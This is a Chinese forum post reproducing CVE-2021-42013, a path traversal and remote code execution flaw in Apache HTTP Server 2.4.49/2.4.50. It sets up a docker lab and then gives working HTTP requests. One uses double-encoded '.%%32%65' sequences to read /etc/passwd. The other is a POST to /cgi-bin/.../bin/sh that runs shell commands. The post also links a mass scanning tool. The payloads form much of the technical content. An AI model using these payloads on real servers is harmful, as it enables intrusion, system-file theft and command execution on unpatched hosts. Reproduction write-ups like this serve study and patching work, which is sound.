Apache HTTP Server 路径遍历漏洞以及RCE

spider   ·   发表于 2021-10-11 09:36:22   ·   漏洞文章

本次漏洞编号为:CVE-2021-42013

漏洞简介

Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。

Apache HTTP Server 存在路径遍历漏洞,该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。

漏洞公布

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-pathtrv-LAzg68cZ

影响版本

Apache HTTPd 2.4.49/2.4.50版本

环境搭建过程

用docker一键搭建

  1. sudo docker pull blueteamsteve/cve-2021-41773:no-cgid
  2. sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

漏洞验证过程

目录遍历payload,读取passwd文件

  1. GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
  2. Host: 192.168.123.130:8080
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en;q=0.7
  9. Cookie: seraph.confluence=524289%3A0c7b1f76339049133e306426161621fb136996fc
  10. If-None-Match: "2d-432a5e4a73a80"
  11. If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT
  12. Connection: close

复现结果

其实根据这个漏洞还能RCE的,但是因为我环境有点问题无法复现,由于复现难度不高,所以就贴图了,给个payload就好了

  1. POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1
  2. Host: host
  3. Connection: close
  4. Content-Length: 13
  5. echo;ifconfig

由此可见,该漏洞继上次的CVE-2021-41773漏洞修复并不完善,所以才导致了本次漏洞的发生!

一个图片总结这次ApacheHTTPd 2.4.50版本修复不完善。
(图片是盗inbug的哈哈哈哈,完美的诠释了本次漏洞的修复哈哈哈哈)

此外,Inbug实验室还提供了批量多线程检测

Apache 2.4.49 (CVE-2021-41773)
Apache 2.4.50 (CVE-2021-42013)
Github地址:
https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013

用户名金币积分时间理由
Track-劲夫 40.00 0 2021-10-23 14:02:30 一个受益终生的帖子~~

打赏我,让我更有动力~

0 条回复   |  直到 2021-10-11 | 1047 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.